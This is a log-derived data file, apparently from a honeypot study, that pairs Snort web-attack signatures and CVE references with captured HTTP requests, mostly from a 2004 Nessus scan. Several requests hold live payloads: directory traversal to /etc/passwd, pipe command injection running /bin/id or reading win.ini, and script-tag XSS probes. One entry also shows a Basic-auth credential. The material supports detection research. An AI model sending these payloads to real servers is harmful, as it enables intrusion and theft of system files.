1578		attempted-recon	WEB-MISC Domino statrep.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /statrep.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/statrep.nsf ---------------------------------------- GET /statrep.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1579		attempted-recon	WEB-MISC Domino webadmin.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /webadmin.nsf HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webadmin.nsf ---------------------------------------- GET /webadmin.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=89 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1580		attempted-recon	WEB-MISC Domino events4.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /events4.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/events4.nsf ---------------------------------------- GET /events4.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=85 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1581		attempted-recon	WEB-MISC Domino ntsync4.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /ntsync4.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/ntsync4.nsf ---------------------------------------- GET /ntsync4.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=81 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1582		attempted-recon	WEB-MISC Domino collect4.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:17 2004] "GET /collect4.nsf HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/collect4.nsf ---------------------------------------- GET /collect4.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=79 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1583		attempted-recon	WEB-MISC Domino mailw46.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:17 2004] "GET /mailw46.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/mailw46.nsf ---------------------------------------- GET /mailw46.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=77 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1584		attempted-recon	WEB-MISC Domino bookmark.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:17 2004] "GET /bookmark.nsf HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/bookmark.nsf ---------------------------------------- GET /bookmark.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=75 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1585		attempted-recon	WEB-MISC Domino agentrunner.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:18 2004] "GET /agentrunner.nsf HTTP/1.1" 403 299 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/agentrunner.nsf ---------------------------------------- GET /agentrunner.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1586		attempted-recon	WEB-MISC Domino mail.box access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:18 2004] "GET /mail.box HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/mail.box ---------------------------------------- GET /mail.box HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=71 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1587	arachNIDS 265 BID3885 Nessus 10040 CVE-2000-0521 Nessus 10623	web-application-activity	WEB-MISC cgitest.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:48 2004] "GET /cgi-bin/cgitest.exe HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgitest\.exe" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/cgitest.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cgitest\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1589		web-application-attack	WEB-MISC musicat empower attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:07 2004] "GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/empower ---------------------------------------- GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1591	BID3810 Nessus 10837	web-application-activity	WEB-CGI faqmanager.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:24 2004] "GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1592	Nessus 10838	web-application-activity	WEB-CGI /fcgi-bin/echo.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:47:16 2004] "GET /fcgi-bin/echo.exe?foo=<SCRIPT>alert(document.domain)</SCRIPT> HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/fcgi-bin/echo.exe] for 50000 ms ---------------------------------------- GET /fcgi-bin/echo.exe?foo=<SCRIPT>alert(document.domain)</SCRIPT> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "<[[:space:]]script" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1594	CAN-1999-1050 Nessus 10075	web-application-activity	WEB-CGI FormHandler.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:31:27 2004] "POST /FormHandler.cgi HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/FormHandler\.cgi" at THE_REQUEST. ---------------------------------------- POST /FormHandler.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, / Accept-Language: en Content-type: application/x-www-form-urlencodedrealname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=nessus%40nessus.org&redirect=http%3A%2F%2Fwww.nessus.org&recipient=nessus%40nessus.org Host: www.testproxy.net User-Agent: Nessus mod_security-message: Warning. Pattern match "/FormHandler\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1595	CAN-2000-0122 CAN-2000-0256 Nessus 10376	web-application-activity	WEB-IIS htimage.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:51 2004] "GET /cgi-bin/htimage.exe HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/htimage\.exe" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/htimage.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/htimage\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1597	CVE-1999-0237 Nessus 10098	web-application-activity	WEB-CGI guestbook.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:50 2004] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=\|/bin/id\| HTTP/1.1" 404 301 Handler: (null) Error: mod_security: Warning. Pattern match "/guestbook\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-sys/guestbook.cgi?user=cpanel&template=\|/bin/id\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/guestbook\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1599	BID921 CAN-2000-0054	web-application-activity	WEB-CGI search.cgi access	Request: 61.237.215.17 - - [Wed Mar 10 00:48:04 2004] "GET http://www.honey-search.com/cgi-bin/smartsearch/search.cgi?keywords=Flowers&username=gu0000 HTTP/1.0" 200 71 Handler: proxy-server Error: mod_security: Warning. Pattern match "/search\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.honey-search.com/cgi-bin/smartsearch/search.cgi?keywords=Flowers&username=gu0000 HTTP/1.0 Accept: image/gif, image/jpeg, image/x-xbitmap, application/msword, / Accept-Language: en-us Host: www.honey-search.com Pragma: no-cache Referer: http://www.linkou.con.cn User-Agent: Mozilla/4.5 [en-us] (Win98; I) X-Forwarded-For: 208.65.173.33 mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 200 OK Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
1600	CVE-2000-0208	web-application-attack	WEB-CGI htsearch arbitrary configuration file attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:41:20 2004] "GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/htsearch] for 50000 ms ---------------------------------------- GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/htsearch\?-c" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1602	CVE-2000-0208	web-application-activity	WEB-CGI htsearch access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:43 2004] "GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 296 Handler: cgi-script Error: mod_security: Warning. Pattern match "/htsearch" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/htsearch" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1608	CVE-1999-0264 BID2001	web-application-attack	WEB-CGI htmlscript attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:06 2004] "GET /cgi-bin/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/htmlscript] for 50000 ms ---------------------------------------- GET /cgi-bin/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/htmlscript\?\.\./\.\." at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1612	Nessus 10467 BID1471 CAN-2000-0674	web-application-attack	WEB-MISC ftp.pl attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:07 2004] "GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ftp ---------------------------------------- GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1614	CAN-1999-1006 BID879	attempted-recon	WEB-MISC Novell Groupwise gwweb.exe attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:12 2004] "GET /GW5/GWWEB.EXE?HELP=bad-request HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/GW5 ---------------------------------------- GET /GW5/GWWEB.EXE?HELP=bad-request HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1637	BID1668 arachNIDS 462 CVE-2000-0853	attempted-recon	WEB-CGI yabb access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:00 2004] "GET /yabbse/index.php?board=nonexistant727076206 HTTP/1.1" 404 296 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/yabbse/index.php ---------------------------------------- GET /yabbse/index.php?board=nonexistant727076206 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1645	BID7214 Nessus 11610	web-application-activity	WEB-CGI testcgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:08 2004] "GET /cgi-bin/testcgi.exe?<script>x</script> HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/testcgi.exe ---------------------------------------- GET /cgi-bin/testcgi.exe?<script>x</script> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1646		web-application-activity	WEB-CGI test.cgi access	Request: 217.13.212.74 - - [Fri Mar 12 02:01:17 2004] "POST http://earth.prohosting.com/lauril/cgi-bin/test.cgi HTTP/1.0" 200 905 Handler: proxy-server Error: mod_security: Warning. Pattern match "/test\.cgi" at THE_REQUEST. ---------------------------------------- POST http://earth.prohosting.com/lauril/cgi-bin/test.cgi HTTP/1.0 Accept: / Accept-Encoding: gzip, deflate Accept-Language: ru, en Content-Length: 43 Content-Type: application/x-www-form-urlencoded Host: earth.prohosting.com Pragma: no-cache Proxy-Connection: close Referer: http://earth.prohosting.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 2000; DigExt) mod_security-message: Warning. Pattern match "/test\.cgi" at THE_REQUEST. par1=dhfsdjk&par2=hasdjfhskj&par3=fhasdjfsh HTTP/1.0 200 OK Content-Length: 905 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
1648	Nessus 10173 arachNIDS 219 CA-1996-11 CAN-1999-0509	attempted-recon	WEB-CGI perl.exe command attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:40:34 2004] "GET /cgi-bin/perl.exe?-v HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/perl.exe] for 50000 ms ---------------------------------------- GET /cgi-bin/perl.exe?-v HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/perl\.exe\?" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1649	Nessus 10173 arachNIDS 219 CA-1996-11 CAN-1999-0509	attempted-recon	WEB-CGI perl command attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:40:29 2004] "GET /cgi-bin/perl?-v HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/perl] for 50000 ms ---------------------------------------- GET /cgi-bin/perl?-v HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/perl\?" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1650	BID770 CAN-1999-0885	web-application-activity	WEB-CGI tst.bat access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:56 2004] "GET /cgi-bin/tst.bat\|type%20c:\windows\win.ini HTTP/1.1" 404 319 Handler: cgi-script Error: mod_security: Warning. Pattern match "/tst\.bat" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/tst.bat\|type%20c:\windows\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/tst\.bat" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1653	BID1975	web-application-activity	WEB-CGI campus access	Request: 69.105.196.251 - - [Sat Mar 13 13:10:34 2004] "GET http://www.greatsexu.com/hallways/campusjump.html HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.greatsexu.com/hallways/campusjump.html] for 50000 ms ---------------------------------------- GET http://www.greatsexu.com/hallways/campusjump.html HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, / Authorization: Basic ZW1taXR0dHQ6c21pdGgyMg== Host: www.greatsexu.com Referer: <NONE> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6 mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1656		web-application-activity	WEB-CGI pfdispaly.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/pfdispaly.cgi ---------------------------------------- GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1658	Nessus 10591 BID1864 CAN-2000-0940	web-application-activity	WEB-CGI pagelog.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:36:47 2004] "GET /cgi-bin/pagelog.cgi HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/pagelog\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/pagelog.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/pagelog\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1660		web-application-activity	WEB-IIS trace.axd access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:17 2004] "GET /trace.axd HTTP/1.1" 200 578 Handler: (null) Error: mod_security: Warning. Pattern match "/trace\.axd" at THE_REQUEST. ---------------------------------------- GET /trace.axd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "TRACE" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1700	arachNIDS 412 CVE-1999-0951	web-application-activity	WEB-CGI imagemap.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:51 2004] "GET /cgi-bin/imagemap.exe HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/imagemap.exe ---------------------------------------- GET /cgi-bin/imagemap.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1703	CAN-2001-0212 BID2367 Nessus 10638	web-application-attack	WEB-CGI auktion.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/auktion.cgi ---------------------------------------- GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1704	BID2663 CVE-2001-0463	web-application-attack	WEB-CGI cal_make.pl directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:40:22 2004] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
